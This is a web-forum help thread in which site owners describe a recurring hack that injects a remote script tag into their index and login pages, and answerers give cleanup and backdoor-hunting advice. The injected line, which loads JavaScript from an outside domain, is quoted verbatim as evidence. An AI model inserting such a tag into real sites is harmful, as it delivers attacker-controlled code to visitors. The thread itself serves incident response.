sealionstaff
asked on
Virus script found in all index and home page
Hi,
I am currently facing this problem that I can't find any help from the hosting company and it's driving me crazy.
All of a sudden most of my websites on different servers get the same virus that would add this line of code before the </body> tag of all index, home and login pages regardless of php or html, etc.
this is what it looks like:
<!-- o65 --><script type='text/javascript' src='http://livestats.co.cc/script.js'></script><!-- c65 -->
I tried delete them, but one or two weeks later, they appear again. And I asked the hosting to scan their server, they also found nothing.
Does anybody have experience with this or suggest any solution?
Please help me out. Thank you very much.
I am currently facing this problem that I can't find any help from the hosting company and it's driving me crazy.
All of a sudden most of my websites on different servers get the same virus that would add this line of code before the </body> tag of all index, home and login pages regardless of php or html, etc.
this is what it looks like:
<!-- o65 --><script type='text/javascript' src='http://livestats.co.cc/script.js'></script><!-- c65 -->
I tried delete them, but one or two weeks later, they appear again. And I asked the hosting to scan their server, they also found nothing.
Does anybody have experience with this or suggest any solution?
Please help me out. Thank you very much.
ASKER
Hi LHerrou
Thank you very much. I know I sound dumb, but can you give me a more detail instruction of how to look for such a "backdoor" if it exist? I don't have CMS on this website, but I have OSC Commerce. But this virus also appear on sites that don't use OSC Commerce...
Thanks,
Ann
Thank you very much. I know I sound dumb, but can you give me a more detail instruction of how to look for such a "backdoor" if it exist? I don't have CMS on this website, but I have OSC Commerce. But this virus also appear on sites that don't use OSC Commerce...
Thanks,
Ann
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Yes, I have to agree with Admin3k - everything has to be cleaned out. Sometimes the hackers even install within the datebase for the cart, so when the cart runs, they re-infect all over again. It's also possible (if this is shared hosting) that another account was compromised, and your infection is incidental to that. Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans.
Here's a couple more in-depth descriptions of how to handle this:
Specific OS Commerce info:
http://www.oscmax.com/forums/oscmax-v2-customization-mods/16496-website-recently-hacked.html
More general info:
http://25yearsofprogramming.com/blog/20070705.htm
Specific OS Commerce info:
http://www.oscmax.com/forums/oscmax-v2-customization-mods/16496-website-recently-hacked.html
More general info:
http://25yearsofprogramming.com/blog/20070705.htm
ASKER
Hi everyone,
Thanks for helping out.
Lherrou, I have a question regarding what you said about "Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans."
I agree that we need their help, because it's the same virus on a few different websites we host at the same hosting. Not all of them has OS commerce, so I kinda guess that it's not the root of the problem (I might be wrong anyway) . If they can't find anything with anti virus scans, then what should I ask them to do?
Thanks for helping out.
Lherrou, I have a question regarding what you said about "Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans."
I agree that we need their help, because it's the same virus on a few different websites we host at the same hosting. Not all of them has OS commerce, so I kinda guess that it's not the root of the problem (I might be wrong anyway) . If they can't find anything with anti virus scans, then what should I ask them to do?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
I'd like to ask a few follow up questions - this issue is exactly what I have right now.
The attack seems to inflect any file named 'index' or 'auth' - so index.php index.htm etc.
My un-educated short term fix is to:
hand-edit out the injected extra script (is always at the bottom) and then change the file permissions from 644 (rw for owner) to 444 (read only - all users).
Since I know little about these things, I assumed that since blocking write access by 'owner' meant that it was one of the 4 PC I use to admin my site was the source of the infection.
It that right/wrong/maybe/possible
BTW: I basically only find out about the inflection when the virus scanner on my PC scans the daily backups of my site. I use AVG free and it seems to alert with 2 or 3 specific found virus names on those infected files. The AVG knowledge base though comes up blank about these viruses (today's was called 'JS/Downloader.Agent' which I guess is just a generic name - some days it mentions a more specific virus name). What is this virus doing?
If this is a host based thing - or injected from outside. Please could you give more guidance to a beginner about finding the source.
Thanks
The attack seems to inflect any file named 'index' or 'auth' - so index.php index.htm etc.
My un-educated short term fix is to:
hand-edit out the injected extra script (is always at the bottom) and then change the file permissions from 644 (rw for owner) to 444 (read only - all users).
Since I know little about these things, I assumed that since blocking write access by 'owner' meant that it was one of the 4 PC I use to admin my site was the source of the infection.
It that right/wrong/maybe/possible
BTW: I basically only find out about the inflection when the virus scanner on my PC scans the daily backups of my site. I use AVG free and it seems to alert with 2 or 3 specific found virus names on those infected files. The AVG knowledge base though comes up blank about these viruses (today's was called 'JS/Downloader.Agent' which I guess is just a generic name - some days it mentions a more specific virus name). What is this virus doing?
If this is a host based thing - or injected from outside. Please could you give more guidance to a beginner about finding the source.
Thanks
XXhris,
I encourage you to open your own question on this topic. Having said that, my guess is that this is (or was) injected from the outside. Someone found a vulnerability on your site (or potentially another site that shares the same server), and used that to break in. Once they are in, they are treated as having owner access, so they can continue to re-infect files as they please, or their script / virus automatically does so when it detects that you have deleted it.
First step: Copy all files from your webserver to a local hard drive using FTP.
Second step: Notify your web host, and follow any directions that they may have. This should include changing your FTP password.
Third step: If they give you the OK (they may wish to preserve things for forensic analysis), delete all files on your webserver.
Fourth step: Make sure all files you downloaded are clean (better yet, use an older backup of the site or your originals) and upload again - make sure that any web applications or databases are also secure.
If you feel uncomfortable with any of this, you should utilize the services of a web security consultant, especially if you keep any kind of secure information on your website.
Cheers,
LHerrou
I encourage you to open your own question on this topic. Having said that, my guess is that this is (or was) injected from the outside. Someone found a vulnerability on your site (or potentially another site that shares the same server), and used that to break in. Once they are in, they are treated as having owner access, so they can continue to re-infect files as they please, or their script / virus automatically does so when it detects that you have deleted it.
First step: Copy all files from your webserver to a local hard drive using FTP.
Second step: Notify your web host, and follow any directions that they may have. This should include changing your FTP password.
Third step: If they give you the OK (they may wish to preserve things for forensic analysis), delete all files on your webserver.
Fourth step: Make sure all files you downloaded are clean (better yet, use an older backup of the site or your originals) and upload again - make sure that any web applications or databases are also secure.
If you feel uncomfortable with any of this, you should utilize the services of a web security consultant, especially if you keep any kind of secure information on your website.
Cheers,
LHerrou
Do you have a Content Management System or other scripts on your website? It sounds like someone is exploiting a hole in some script, accessing your site, and placing the code into your pages.
If you have access to the log files, you might be able to determine where the hackers are coming from, and ask your hosting company to block their IP address out. You also will need to determine which script has the vulnerability and remove or repair it. Also, once the hole has been found, these hackers frequently place their own access tools on the server, so you'll need to look around and see if they've left a backdoor behind.
Cheers,
LHerrou